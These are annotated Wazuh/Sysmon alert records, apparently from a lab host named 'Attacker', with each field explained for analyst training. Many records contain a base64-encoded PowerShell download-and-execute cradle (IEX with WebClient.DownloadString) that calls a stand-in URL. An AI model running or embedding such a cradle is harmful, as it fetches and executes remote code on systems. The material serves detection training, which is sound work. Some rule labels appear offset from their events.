data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:02.5885586Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283390 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:01.400
ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00}
ProcessId: 9884
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00}
ParentProcessId: 11360
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:01.400 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11360 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 48 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534231.1316177 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:03.0764574Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283407 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:03.058
ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00}
ProcessId: 9884
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_01e43x2y.p5y.ps1
CreationUtcTime: 2025-04-24 22:37:03.058
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:03.058 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_01e43x2y.p5y.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:03.058 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 45 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534231.1318942 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:06.0543381Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283457 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:04.739
ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00}
ProcessId: 8832
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00}
ParentProcessId: 9884
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:04.739 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd10-680a-300b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 49 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534231.1327005 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:06.2915982Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283458 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:06.270
ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00}
ProcessId: 8832
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5pbr2kjg.zae.ps1
CreationUtcTime: 2025-04-24 22:37:06.270
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:06.270 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd10-680a-300b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5pbr2kjg.zae.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:06.270 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 46 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534232.1329770 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:09.0167902Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283484 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:07.666
ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00}
ProcessId: 11044
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd10-680a-300b-000000000e00}
ParentProcessId: 8832
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:07.666 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd13-680a-340b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
